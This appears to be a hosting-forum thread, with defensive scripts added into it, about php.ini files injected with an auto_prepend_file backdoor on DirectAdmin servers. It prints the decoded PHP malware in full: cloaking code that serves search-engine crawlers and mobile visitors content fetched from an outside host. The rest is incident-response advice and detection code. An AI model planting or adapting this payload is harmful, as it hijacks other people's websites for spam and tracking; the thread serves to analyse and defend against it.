the php.ini have been injected with backdoor code auto_prepend_file

gztony8 (Verified User; joined Aug 26, 2022; 13 messages)
Recently, we discovered that the php.ini files of multiple PHP versions on several servers have been injected with backdoor code, causing PHP websites to fail to operate. The code injection in some servers occurred after a DirectAdmin update. We are unsure whether this is an issue with the server's security configuration or a problem related to the DirectAdmin update.

The injected code in the php.ini files is as follows:

auto_prepend_file = "data:;base64,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"
 
If anyone CBA to decode:
Code:
<?php
set_time_limit(0);error_reporting(0);
class IncPhp {
    public static function run() {
        $url = $_SERVER['REQUEST_URI'];
        $ref = !isset($_SERVER['HTTP_REFERER']) ? '' : $_SERVER['HTTP_REFERER'];
        $ent = $_SERVER['HTTP_USER_AGENT'];
        $site = base64_decode("http://xml.asdgod.com");
        $memes = "/?referer=" . urlencode($ref);
        $regs = '/Baiduspider|360spider|Sosospider|Sogouspider|YisouSpider|Sogou web spider|Bytespider/i';
        $mobile = '/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/';
        $area = preg_match('/.doc|.docx|.xlsx|.pdf|.shtml|.txt|.xml|.xls|.csv|.ppt|.pptx|\/news\/|\/article\/|sadsaw/i', $url);
        if (preg_match($regs, $ent)) {
            if ($area) { header("Content-Type: text/html;charset=utf-8");$ip = self::getClientIp();exit(self::get($ent,$site ."/?u=". $url."&xy=1&pp=".$ip."&host=".$_SERVER['HTTP_HOST']));}
            else { echo self::get($ent,$site . "/link");ob_flush();flush();}
        }
        if ($area && preg_match($mobile, $ent)) exit(self::get($site . $memes));       
    }
    static function get($ent,$url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_USERAGENT, $ent);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $output = curl_exec($ch);
        curl_close($ch);
        return $output;
    }
   static function GetClientIp()
   {
      if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
         $ipAddresses = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
         $clientIP = trim(end($ipAddresses));
      } elseif (!empty($_SERVER['HTTP_X_REAL_IP'])) {
         $clientIP = $_SERVER['HTTP_X_REAL_IP'];
      } else {
         $clientIP = $_SERVER['REMOTE_ADDR'];
      }
      return $clientIP;
   }
}
IncPhp::run();
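A defender's check for the injection shape described above, added here as an example (not code from the thread or from DirectAdmin): it reads php.ini text, finds `auto_prepend_file` / `auto_append_file` directives, and flags values that are `data:` URIs (code embedded directly in the ini), remote URLs or stream wrappers, or file paths not on an allow-list. It decodes a base64 `data:` payload only to show a preview, so the scanner itself never executes anything. The sample ini content and its payload are constructed (a harmless PHP comment), and the allow-list parameter is an assumption of this example. The same script can be re-run daily, as a later reply suggests, to see whether the directive comes back.

```python
import base64
import re
import sys
import urllib.parse

# Directives that make PHP include a file before/after every script.
LINE_RE = re.compile(
    r"^\s*(auto_prepend_file|auto_append_file)\s*=\s*(.*?)\s*$", re.IGNORECASE
)
# Schemes/stream wrappers that should never appear in these directives.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "phar://", "expect://")

# Constructed sample php.ini (NOT the payload from the thread); the base64
# payload here is a harmless PHP comment so the example can decode it safely.
SAMPLE_PAYLOAD = b"<?php /* constructed harmless sample */ ?>"
SAMPLE_INI = (
    "; php.ini (constructed sample)\n"
    "memory_limit = 256M\n"
    'auto_prepend_file = "data:;base64,'
    + base64.b64encode(SAMPLE_PAYLOAD).decode()
    + '"\n'
    "auto_append_file =\n"
    "; auto_prepend_file = /etc/php/prepend.php\n"
)


def strip_quotes(raw):
    """Remove one pair of surrounding quotes, as php.ini allows."""
    v = raw.strip()
    if len(v) >= 2 and v[0] == v[-1] and v[0] in "\"'":
        v = v[1:-1]
    return v


def decode_data_uri(value):
    """Return the code carried by a data: URI as text (base64 or percent-encoded)."""
    header, _, payload = value.partition(",")
    if ";base64" in header.lower():
        try:
            return base64.b64decode(payload).decode("utf-8", "replace")
        except ValueError:
            return "<undecodable base64>"
    return urllib.parse.unquote(payload)


def find_suspicious_prepends(ini_text, allowed_paths=()):
    """Scan php.ini text; return a list of findings (dicts) for
    auto_prepend_file / auto_append_file values that need attention."""
    findings = []
    for lineno, line in enumerate(ini_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # comments (';'), blank lines, other directives
        directive = m.group(1).lower()
        value = strip_quotes(m.group(2))
        if not value:
            continue  # directive present but unset: the normal state
        low = value.lower()
        if low.startswith("data:"):
            findings.append({
                "line": lineno, "directive": directive, "severity": "critical",
                "reason": "inline data: URI, i.e. code embedded in php.ini",
                "preview": decode_data_uri(value)[:80],
            })
        elif low.startswith(REMOTE_SCHEMES):
            findings.append({
                "line": lineno, "directive": directive, "severity": "critical",
                "reason": "remote URL or stream wrapper", "preview": value,
            })
        elif value not in allowed_paths:
            findings.append({
                "line": lineno, "directive": directive, "severity": "review",
                "reason": "file path not on the allow-list", "preview": value,
            })
    return findings


def scan_files(paths, allowed_paths=()):
    """Run the check over real php.ini files; returns {path: findings}."""
    report = {}
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                report[path] = find_suspicious_prepends(fh.read(), allowed_paths)
        except OSError as exc:
            report[path] = [{"severity": "error", "reason": str(exc)}]
    return report


if __name__ == "__main__":
    # Usage: python3 check_prepend.py /usr/local/php*/lib/php.ini ...
    # With no arguments it demonstrates on the constructed sample.
    if len(sys.argv) > 1:
        for path, found in scan_files(sys.argv[1:]).items():
            for f in found:
                print(f"{path}: {f}")
    else:
        for f in find_suspicious_prepends(SAMPLE_INI):
            print(f)
```

Pass the php.ini paths of every installed PHP version (the thread reports several versions being hit at once), and treat any `critical` finding as a sign that the host, not just the web root, needs an incident review.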
 
or a problem related to the DirectAdmin update.

I would say it's very unlikely to be a result of a DirectAdmin update - I haven't personally seen any similar cases like this, and if it causes websites to fail to work properly, I imagine there would be quite a few complaints.

This might sound like a silly question, but where did you get your DirectAdmin license from? The reason I ask is that there's, sadly, a lot of fraudulent license providers which are much cheaper than retail, but there's a reason for that - they're very much not legitimate and usually have serious security flaws.
 
and usually have serious security flaws.
Not to mention backdoors in some hacked or nulled versions.

We also didn't experience this at any of our servers; however, compared to others we only have a few servers.
Almost certainly this is not caused by a DA update.

I would remove the code, and then check every day if it comes back. If yes, start checking logfiles (which you already can do now too just to be sure) and see if you can find odd or suspicious behaviour.

Hopefully you're not root hacked, however that is also not impossible.
It might be a good idea to scan your complete system with Maldetect after removing this code. Or similar software.
Also check your root bash_history file.

Also check what other software (next to DA) you have running on the infected servers, especially 3rd party applications.

However, in case you would be using illegal versions, there is no way of saying what could be causing or has caused the issue.
 
My server works perfectly fine with every update.

Check if you have any weird custom scripts in

#/usr/local/directadmin
Code:
/scripts/custom/
/custombuild/custom

Maybe it came from 3rd party plugins that you installed without checking.
 
It might be a good idea to scan your complete system with Maldetect after removing this code. Or similar software.

Maldetect will most likely give false positives on binaries and MySQL files, so I would not suggest doing it. It should be used only against plain-text files.
 
For RHEL based Linux, you may use this to verify the OS binary integrity

Code:
rpm --verify --all

# also, see the "verify options" section of the rpm man page for the meaning of the result flags
man rpm
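To make the `rpm --verify --all` output actionable, here is an added triage script (an example of mine, not from the thread or from rpm): it parses the verify lines using the flag columns documented in rpm(8) (S size, M mode, 5 digest, D device, L readlink, U user, G group, T mtime, P capabilities; `.` passed, `?` not testable; `missing` for absent files; an optional type letter such as `c` for config files) and separates changed executables and libraries from config edits and harmless mtime-only drift. The sample output below is constructed, and the list of "code" directories is an assumption of this example.

```python
import re

# One rpm -V result line: 9 attribute flags (or the word "missing"),
# an optional file-type letter (c=config, d=doc, g=ghost, l=license, r=readme),
# then the path. Flag letters per rpm(8) "verify options":
#   S size, M mode, 5 digest, D device, L readlink, U user, G group, T mtime,
#   P capabilities; '.' = test passed, '?' = test could not be performed.
VERIFY_RE = re.compile(r"^(missing|[SM5DLUGTP.?]{9})\s+(?:([cdglr])\s+)?(\S.*)$")

# Directories where a changed file means a changed executable or library
# (assumed list for this example; extend to match the distribution).
CODE_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/lib64/",
                 "/usr/libexec/", "/bin/", "/sbin/", "/lib/", "/lib64/")

# Constructed sample output (not from the thread's servers).
SAMPLE_VERIFY = """\
S.5....T.    /usr/bin/php
.......T.    /usr/lib64/libz.so.1
S.5....T.  c /etc/php.ini
missing     /usr/sbin/sshd
..?......    /usr/lib/locale/locale-archive
"""


def parse_verify_line(line):
    """Split one rpm -V line into flags, file type and path; None if not a result line."""
    m = VERIFY_RE.match(line.rstrip("\n"))
    if not m:
        return None
    flags, ftype, path = m.groups()
    return {"flags": flags, "type": ftype, "path": path}


def triage_rpm_verify(text):
    """Classify rpm --verify lines: 'critical' for changed or missing code
    files, 'config' for changed config files, 'info' for mtime-only/unknown."""
    findings = []
    for line in text.splitlines():
        rec = parse_verify_line(line)
        if rec is None:
            continue
        flags, path = rec["flags"], rec["path"]
        # Digest or size differences (or a missing file) mean content changed;
        # a lone 'T' is usually just a touched mtime.
        content_changed = flags == "missing" or "5" in flags or "S" in flags
        if rec["type"] == "c":
            rec["severity"] = "config" if content_changed else "info"
        elif content_changed and path.startswith(CODE_PREFIXES):
            rec["severity"] = "critical"
        else:
            rec["severity"] = "info"
        findings.append(rec)
    return findings


def critical_paths(text):
    """Paths of changed/missing executables and libraries, in output order."""
    return [f["path"] for f in triage_rpm_verify(text) if f["severity"] == "critical"]


if __name__ == "__main__":
    # Real use: rpm --verify --all | python3 triage_rpm_verify.py
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_VERIFY
    for f in triage_rpm_verify(data):
        print(f"{f['severity']:<8} {f['flags']:<9} {f['path']}")
```

A `critical` hit on something like the PHP binary or sshd is exactly the case where a file-level cleanup is not enough. Note the check only covers files that came from packages; CustomBuild-compiled PHP under /usr/local lives outside rpm's database, so its binaries need a separate baseline (for example, stored hashes) to compare against.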
 
Maldetect will most-likely give false positives on binaries and mysql files.
I've not experienced this until now. But it might happen, so indeed it might be better to use another method on the OS and use Maldetect on the /home directories.
 
I can recall one case when I had to recover a MySQL installation. A server owner ran a maldet scan against the / (root) partition with quarantine mode enabled. I don't recall whether custom virus definitions were used or not, but some critically important MySQL files, including data files, were moved to quarantine.

Since then I list binary paths and MySQL data directory in /usr/local/maldetect/ignore_paths

I've not experienced this until now.
 
/var/log/directadmin/login.log

2024:06:06-14:48:12: '122.114.17.126' successful Basic Auth/API login to 'haicheng' via 'admin'
2024:06:06-14:48:21: '122.114.17.126' successful Basic Auth/APl login to 'haicheng' via 'admin'
2024:06:07-00:25:42: '216.83.53.51' 2 failed login attempts. Account 'admin'
2024:06:07-00:25:59: '216.83.53.51' 3 failed login attempts. Account 'admin'
2024:06:07-00:26:02: '216.83.53.51' 4 failed login attempts. Account 'admin'
2024:06:07-00:29:06: '216.83.53.51' successful login to 'aitenite' via 'admin'
2024:06:07-06:17:01: '122.114.243.108' successful login to 'admin'

These log entries are the hacker's logins. At 2024:06:07-00:29:06, my port 2222 is only open to a whitelist of IPs; I don't know how they managed to log in. How can I find out where they are breaking in from?
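For the question of where the logins came from, an added example (mine, not from the thread or from DirectAdmin) that parses login.log lines in the two shapes shown above (`'<ip>' successful ... login to '<user>' via '<admin>'` and `'<ip>' <n> failed login attempts. Account '<user>'`), lists successful logins from IPs outside the list you intended to allow, and pairs failed-attempt counters with a later success from the same IP. The sample lines are constructed with documentation IP ranges; the field layout is taken from the posted log, and anything beyond those two line shapes is an assumption.

```python
import re
from collections import defaultdict

# Line shapes as posted from /var/log/directadmin/login.log:
#   <ts>: '<ip>' successful [Basic Auth/API ]login to '<user>'[ via '<admin>']
#   <ts>: '<ip>' <n> failed login attempts. Account '<user>'
LINE_RE = re.compile(r"^(\d{4}:\d{2}:\d{2}-\d{2}:\d{2}:\d{2}): '([^']+)' (.*)$")
SUCCESS_RE = re.compile(r"^successful .*?login to '([^']+)'(?: via '([^']+)')?")
FAILED_RE = re.compile(r"^(\d+) failed login attempts\. Account '([^']+)'")

# Constructed sample using documentation IP ranges (not the thread's IPs).
SAMPLE_LOG = """\
2024:06:06-14:48:12: '198.51.100.10' successful Basic Auth/API login to 'siteuser' via 'admin'
2024:06:07-00:25:42: '203.0.113.7' 2 failed login attempts. Account 'admin'
2024:06:07-00:25:59: '203.0.113.7' 3 failed login attempts. Account 'admin'
2024:06:07-00:29:06: '203.0.113.7' successful login to 'otheruser' via 'admin'
2024:06:07-06:17:01: '192.0.2.5' successful login to 'admin'
this line is not in the expected format
"""


def parse_line(line):
    """Parse one login.log line into a dict, or None if it is not a log line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, rest = m.groups()
    s = SUCCESS_RE.match(rest)
    if s:
        return {"ts": ts, "ip": ip, "event": "success",
                "account": s.group(1), "via": s.group(2)}
    f = FAILED_RE.match(rest)
    if f:
        return {"ts": ts, "ip": ip, "event": "failed",
                "count": int(f.group(1)), "account": f.group(2)}
    return {"ts": ts, "ip": ip, "event": "other", "text": rest}


def analyze_login_log(text, whitelist):
    """Return successful logins from IPs outside `whitelist`, the highest
    failed-attempt counter seen per IP, and IPs that failed and then succeeded."""
    unlisted = []
    failed_max = defaultdict(int)
    failed_then_success = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["event"] == "failed":
            # The log shows a running counter ("2 failed", "3 failed"), so keep
            # the maximum rather than summing the lines.
            failed_max[rec["ip"]] = max(failed_max[rec["ip"]], rec["count"])
        elif rec["event"] == "success":
            if rec["ip"] not in whitelist:
                unlisted.append(rec)
            if failed_max.get(rec["ip"], 0) > 0 and rec["ip"] not in failed_then_success:
                failed_then_success.append(rec["ip"])
    return {"unlisted_success": unlisted,
            "failed_max": dict(failed_max),
            "failed_then_success": failed_then_success}


if __name__ == "__main__":
    # Usage: python3 login_audit.py < /var/log/directadmin/login.log
    import sys
    intended_whitelist = {"192.0.2.5"}  # assumed: the IPs you meant to allow
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    report = analyze_login_log(data, intended_whitelist)
    for rec in report["unlisted_success"]:
        print(f"{rec['ts']} login to {rec['account']!r} from unlisted {rec['ip']}"
              + (f" via {rec['via']!r}" if rec["via"] else ""))
    print("failed counters:", report["failed_max"])
    print("failed then succeeded:", report["failed_then_success"])
```

Compare against the whitelist you intended, written down from memory or from a backup, rather than the firewall's current state: once a backdoor runs as the web user or higher, the allow-list on the box can itself have been edited, which is the point the next reply makes. A success with `via 'admin'` from an unlisted IP tells you which account's credentials or session to treat as compromised.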
 
You know, when there is a backdoor script, the hacker can whitelist their IP too, change the ssh config, etc., and then log in normally 🫣
 